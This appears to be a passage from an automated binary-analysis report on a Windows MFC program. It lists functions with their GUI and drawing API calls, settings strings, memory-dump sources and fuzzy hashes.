Instruction Fuzzy Hash: 53916031A00615EFDB14CFA4C484BEEB7B1FF48315F14816AD616EB660D778AD82CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FEF1
#500.MFC42 ref: 0040FF40
EndDeferWindowPos.USER32(00000000), ref: 0040FFA0
IsRectEmpty.USER32(?), ref: 0040FFB7
GetClientRect.USER32 ref: 0040FFCB

Strings

4B, xrefs: 0040FF4C, 0040FF51

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$#500ClientDeferEmptyH_prologWindow
String ID: 4B
API String ID: 608460257-455405905
Opcode ID: f7c3c4faa0489aa711c5a7260830754e88dbc69358711e435972e857cbed4fd7
Instruction ID: 7c5ad157890f1bdfd346268783f047a183102b265e78b4f3355c015339179dda
Opcode Fuzzy Hash: f7c3c4faa0489aa711c5a7260830754e88dbc69358711e435972e857cbed4fd7
Instruction Fuzzy Hash: 5A512C31A00216DFCB15DF68D884BEEBBB1FF49304F04417BE809AB696C7789885CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00422D33, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

#2233.MFC42 ref: 00422D41
GetClientRect.USER32 ref: 00422D55
GetParent.USER32(?), ref: 00422D7B
#2864.MFC42(00000000), ref: 00422D82
#4083.MFC42(00000000), ref: 00422D8F
#2642.MFC42(00000000), ref: 00422DE1
#6215.MFC42(00000000,00000000), ref: 00422DE9

Strings

, xrefs: 00422D6A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2233#2642#2864#4083#6215ClientParentRect
String ID:
API String ID: 2194949881-3916222277
Opcode ID: 84d2a6a6f6f747659437eb2ecafb3ab602b062e0f1a8ddaa1331defba45bd32b
Instruction ID: a4b9b4d333dcd9497dfee6d6fc0c0f95b92e39fa146c938b5bad4455d356b511
Opcode Fuzzy Hash: 84d2a6a6f6f747659437eb2ecafb3ab602b062e0f1a8ddaa1331defba45bd32b
Instruction Fuzzy Hash: 6A215E75600218BBCF109FA5D884AAFBBFAFF48354F40842AF81597351DB7899008F64

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC8, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000065), ref: 0040C978

Part of subcall function 004010E1: _EH_prolog.MSVCRT ref: 0040CB60
Part of subcall function 004010E1: #6402.MFC42(Settings,Language,?), ref: 0040CB84
Part of subcall function 004010E1: FreeLibrary.KERNEL32(Settings,Language,?), ref: 0040CB94
Part of subcall function 004010E1: #1168.MFC42 ref: 0040CBC3
Part of subcall function 004010E1: #6026.MFC42(0000E001), ref: 0040CBD9
Part of subcall function 004010E1: #537.MFC42(0000E000,0000E001), ref: 0040CBE7
Part of subcall function 004010E1: #6199.MFC42(00000000,0000E000,0000E001), ref: 0040CBF3
Part of subcall function 004010E1: #800.MFC42(00000000,0000E000,0000E001), ref: 0040CBFF
Part of subcall function 004010E1: #537.MFC42(0000E000,00000000,0000E000,0000E001), ref: 0040CC08
Part of subcall function 004010E1: #800.MFC42(00000000,0000E000,00000000,0000E000,0000E001), ref: 0040CC24

#5732.MFC42(ControlsPos), ref: 0040C997
#6402.MFC42(Settings,OnTop,?,ControlsPos), ref: 0040C9B2
Sleep.KERNEL32(00000064,Settings,OnTop,?,ControlsPos), ref: 0040C9B9
#4413.MFC42 ref: 0040C9C1

Strings

Settings, xrefs: 0040C9AD
ControlsPos, xrefs: 0040C990
OnTop, xrefs: 0040C9A8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#6402#800$#1168#4413#5732#6026#6199FreeH_prologKillLibrarySleepTimer
String ID: ControlsPos$OnTop$Settings
API String ID: 102678380-2609913906
Opcode ID: 149247a05583fe0fdb61f0875c3b22bfc95177bbddcd4ae234a8d647dce00551
Instruction ID: 7b0320836421552ca9a41cd2ecea0f74191a74a18fb416b38105917ad37d0f4b
Opcode Fuzzy Hash: 149247a05583fe0fdb61f0875c3b22bfc95177bbddcd4ae234a8d647dce00551
Instruction Fuzzy Hash: C5F02B30380B2063E51533716C47B5D76511F44F08F01002FFE03352E1CEBE68504A9E

Uniqueness

Uniqueness Score: -1.00%

Function 00422B00, Relevance: 13.6, APIs: 9, Instructions: 128COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00422B0E
#2864.MFC42(00000000), ref: 00422B15
GetClientRect.USER32 ref: 00422B23
#4083.MFC42 ref: 00422B31
#4040.MFC42(?,?,?), ref: 00422B48
#4083.MFC42 ref: 00422B61
#5655.MFC42(00000000,0000FFFF,0000E900,00000001,?,00000000,00000001), ref: 00422B86
#4299.MFC42(?,?,?,?,00000001,00000000,0000FFFF,0000E900,00000001,?,00000000,00000001), ref: 00422BA2
#4299.MFC42(00000001,0000001F,000000FF,?,00000001), ref: 00422C37

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4083#4299$#2864#4040#5655ClientParentRect
String ID:
API String ID: 3326788285-0
Opcode ID: 9de0a155875e0a56ad73581f81c5677037414778eae5ab7957fde952f6025c4b
Instruction ID: 6de61686b386ee14f585d29cfeb7b74335eed05c806e66fdd26aa6f93a2093da
Opcode Fuzzy Hash: 9de0a155875e0a56ad73581f81c5677037414778eae5ab7957fde952f6025c4b
Instruction Fuzzy Hash: 88417C31600119BFDB20DFA9DD85FAFBBB8EB45300F404529F616E6295CA74A840DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00420851, Relevance: 13.6, APIs: 9, Instructions: 91timeCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 00420889
#1233.MFC42(00000040,00000000,00000000,00000000,004422DC,80000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 004208AC
#2152.MFC42(00000008,00000000,00000040,00000000,00000000,00000000,004422DC,80000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004208B7
#1233.MFC42(00000040,00000000,00000000,00000000,004422E0,80000000,00000000,00000000,?,?,?,00000000,00000000,00000008,00000000,00000040), ref: 004208D4
#2152.MFC42(00000008,00000000,00000040,00000000,00000000,00000000,004422E0,80000000,00000000,00000000,?,?,?,00000000,00000000,00000008), ref: 004208DE
#1768.MFC42(00000000,?,00000008,00000000,00000040,00000000,00000000,00000000,004422E0,80000000,00000000,00000000,?,?,?,00000000), ref: 004208F2
#6215.MFC42(00000005,00000000,?,00000008,00000000,00000040,00000000,00000000,00000000,004422E0,80000000,00000000,00000000,?,?,?), ref: 004208FB
UpdateWindow.USER32(?), ref: 00420903
SetTimer.USER32(?,00000001,?,00000000), ref: 00420913

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1233#2152$#1768#6215ObjectTimerUpdateWindow
String ID:
API String ID: 1646406531-0
Opcode ID: c4bfe26994ca9401de4db02c4f67b0b4feb9a7a2b8303b7999292a08bfd28e30
Instruction ID: 14f358a40eb3f574f734e1e2aad0cfbcd444fc3745249a0a60bcc5215b605990
Opcode Fuzzy Hash: c4bfe26994ca9401de4db02c4f67b0b4feb9a7a2b8303b7999292a08bfd28e30
Instruction Fuzzy Hash: 92219271300650BFDB31AB669C4AE6FBFBDEBC9B04F00441EB642A2191DAB59900C778

Uniqueness

Uniqueness Score: -1.00%

Function 0041485A, Relevance: 13.6, APIs: 9, Instructions: 90windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041485F
#5860.MFC42(?,?), ref: 0041489C
#5860.MFC42(?,?,?,?), ref: 004148AB
#823.MFC42(00000024), ref: 004148B2
#5860.MFC42(?,00000000), ref: 004148CD
#2408.MFC42(?,?,00000000), ref: 004148F0
#823.MFC42(00000008,?,?,00000000), ref: 004148F9
#384.MFC42(?,?,00000000), ref: 0041490D
AppendMenuA.USER32 ref: 00414942

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5860$#823$#2408#384AppendH_prologMenu
String ID:
API String ID: 2930576978-0
Opcode ID: 3b0ed844864edb5cfb204eab17feea578c9ff89f964834f5aff9bd9d97d5f7d4
Instruction ID: bd0f554a3aa2e7ea36617df7391d0c4d778716f1c24383817dd27cdf565fc777
Opcode Fuzzy Hash: 3b0ed844864edb5cfb204eab17feea578c9ff89f964834f5aff9bd9d97d5f7d4
Instruction Fuzzy Hash: FD31B274700715AFCB24AF75D841A9ABBA5FF44364B008A2FB526D3690DB38D981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004020D1, Relevance: 13.6, APIs: 9, Instructions: 89COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0042115D
#470.MFC42 ref: 00421171
#283.MFC42(00FF0000), ref: 00421183
#5794.MFC42(0000000C), ref: 004211CC
#5875.MFC42(00000001,0000000C), ref: 004211D9
DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00421203
DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00421224
#2414.MFC42 ref: 00421234
#755.MFC42 ref: 0042124A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$#2414#283#470#5794#5875#755H_prolog
String ID:
API String ID: 3790522868-0
Opcode ID: 6456f99d507f85396830bbf01c92adb70ca233782d288cdaae34899b5f1cee7f
Instruction ID: 47827a279f890b374899f4d3314558ecc3c104cd67b593147fc009a7ce1150e3
Opcode Fuzzy Hash: 6456f99d507f85396830bbf01c92adb70ca233782d288cdaae34899b5f1cee7f
Instruction Fuzzy Hash: 643190719001299FCF04DFA8D985AEEBBB4FF08314F504289E915B7295DB746F44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040170D, Relevance: 13.6, APIs: 9, Instructions: 80windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041E9B2
#482.MFC42(00000000,0014000C,00000000), ref: 0041E9F2
#3067.MFC42(00000000,0014000C,00000000), ref: 0041EA00
#323.MFC42(00000000,0014000C,00000000), ref: 0041EA10
#1640.MFC42(?,00000000,0014000C,00000000), ref: 0041EA22
SendMessageA.USER32 ref: 0041EA3E
#640.MFC42(?,?), ref: 0041EA79
#641.MFC42(?,?), ref: 0041EA88

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1640#3067#323#482#640#641H_prologMessageSend
String ID:
API String ID: 2027644727-0
Opcode ID: 3d7e7e66e0f7d0665f2bbe8a641610e8e0983da2dd13644a6b84d434ad25917d
Instruction ID: 56fb1f6c8eefaf8c873d1d7ab855da3aa7f4d8974a50854db4e3898295fd584a
Opcode Fuzzy Hash: 3d7e7e66e0f7d0665f2bbe8a641610e8e0983da2dd13644a6b84d434ad25917d
Instruction Fuzzy Hash: D6210975A01115DBCB10EFA2D980AEEF7B4FF14348F51406FE84197291DB38AD85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5E5, Relevance: 13.6, APIs: 9, Instructions: 63COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B5EA
#858.MFC42(?), ref: 0040B618
#924.MFC42(?,?,00440608,?), ref: 0040B630
#922.MFC42(?,00000000,?,?,?,00440608,?), ref: 0040B642
#858.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B64F
#800.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B65B
#800.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B667
#800.MFC42(?,00000000,?,00000000,?,?,?,00440608,?), ref: 0040B691
#800.MFC42(?,00000000,?,00000000,?,?,?,00440608,?), ref: 0040B69D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#858$#922#924H_prolog
String ID:
API String ID: 3341725904-0
Opcode ID: a7dde6a0b39c5ed1147e829dd70eba461532255be5b17cf9a85675e960668b6d
Instruction ID: 29590c680b60f95c54894bb472fe276d0f3e76abb3a8f5792579862a2f5a6341
Opcode Fuzzy Hash: a7dde6a0b39c5ed1147e829dd70eba461532255be5b17cf9a85675e960668b6d
Instruction Fuzzy Hash: C521BD71D01158EFDB05EBE5E54ABEEBBB8AF24308F50815EF405A3182DB786708CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402036, Relevance: 13.6, APIs: 9, Instructions: 57windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417C99
#323.MFC42(?,?), ref: 00417CB1
CreateCompatibleDC.GDI32(00000000), ref: 00417CBC
#1640.MFC42(00000000), ref: 00417CC6
#5785.MFC42(00000000,00000000,00000000), ref: 00417CDA
BitBlt.GDI32(00000000,?,?,?,00000000,00000000,00000000,00000000,00CC0020), ref: 00417D07
#5785.MFC42(00000000,00000000), ref: 00417D18
#2405.MFC42(00000000,00000000), ref: 00417D20
#640.MFC42(00000000,00000000), ref: 00417D2C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785$#1640#2405#323#640CompatibleCreateH_prolog
String ID:
API String ID: 519941721-0
Opcode ID: 18d717226c995c7a98ec1448670456091a38dea9363e44d81f86dbaaf9b13830
Instruction ID: 8bbc41a01e652bd3056d5dce278b074d46e3b2d9d71b522f364bba2a2b1df519
Opcode Fuzzy Hash: 18d717226c995c7a98ec1448670456091a38dea9363e44d81f86dbaaf9b13830
Instruction Fuzzy Hash: F9118E32A00129EBCF11EF90EC02FEF7B74EF14714F11851AF911A61A2D738A951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401FBE, Relevance: 13.6, APIs: 9, Instructions: 56COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415666
#554.MFC42 ref: 0041567A
GetDesktopWindow.USER32 ref: 0041568B
#2864.MFC42(00000000), ref: 00415692
#2120.MFC42(00000000,50002800,0000E800), ref: 004156A8
#4163.MFC42(?,00000000,50002800,0000E800), ref: 004156B8
#2012.MFC42(?,?,00000000,50002800,0000E800), ref: 004156CA
#2920.MFC42(00000000,?,?,?,?,?,00000000,50002800,0000E800), ref: 004156E6
#807.MFC42(?,00000000,50002800,0000E800), ref: 00415704

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2012#2120#2864#2920#4163#554#807DesktopH_prologWindow
String ID:
API String ID: 1073575299-0
Opcode ID: fc6c536933978fa229556c1ac3dc39df95b090ab122743ef282f4da7dfc6d938
Instruction ID: 62f7aa4c17448b3c5471202615b6bf73ee109405587de5f72b687ba9733747ae
Opcode Fuzzy Hash: fc6c536933978fa229556c1ac3dc39df95b090ab122743ef282f4da7dfc6d938
Instruction Fuzzy Hash: E911B271A00524DBCB25EB50DD52BEEB334AF10704F90455FB916A6191DB38AB88CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE9, Relevance: 13.6, APIs: 9, Instructions: 53COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040ACEE
#540.MFC42 ref: 0040AD0F
#540.MFC42 ref: 0040AD1D
#3301.MFC42(?,00000000,?,00000000), ref: 0040AD3A
#858.MFC42(00000000,?,00000000,?,00000000), ref: 0040AD47
#800.MFC42(00000000,?,00000000,?,00000000), ref: 0040AD53
#535.MFC42(?,00000000,?,00000000,?,00000000), ref: 0040AD5F
#800.MFC42(?,00000000,?,00000000,?,00000000), ref: 0040AD6D
#800.MFC42(?,00000000,?,00000000,?,00000000), ref: 0040AD79

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#540$#3301#535#858H_prolog
String ID:
API String ID: 1016718970-0
Opcode ID: 8285a71b8a2fbb5b7ce093651d36cf68fe4fc63766f6bc47ff694ee4c6e9d3e2
Instruction ID: df82ad6423d2d68e32c6c02794fb1a73c8a394e13f7992babe85720857e4cead
Opcode Fuzzy Hash: 8285a71b8a2fbb5b7ce093651d36cf68fe4fc63766f6bc47ff694ee4c6e9d3e2
Instruction Fuzzy Hash: D211B671E00169DBCF01EBA5D856BEEB778AF14308F50405EE101B3282CB7C5708CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E19F, Relevance: 13.5, APIs: 9, Instructions: 35COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E1A4
#609.MFC42 ref: 0040E1BD
#609.MFC42 ref: 0040E1CC
#609.MFC42 ref: 0040E1DB
#609.MFC42 ref: 0040E1EA
#609.MFC42 ref: 0040E1F9
#609.MFC42 ref: 0040E208
#609.MFC42 ref: 0040E214
#641.MFC42 ref: 0040E21F

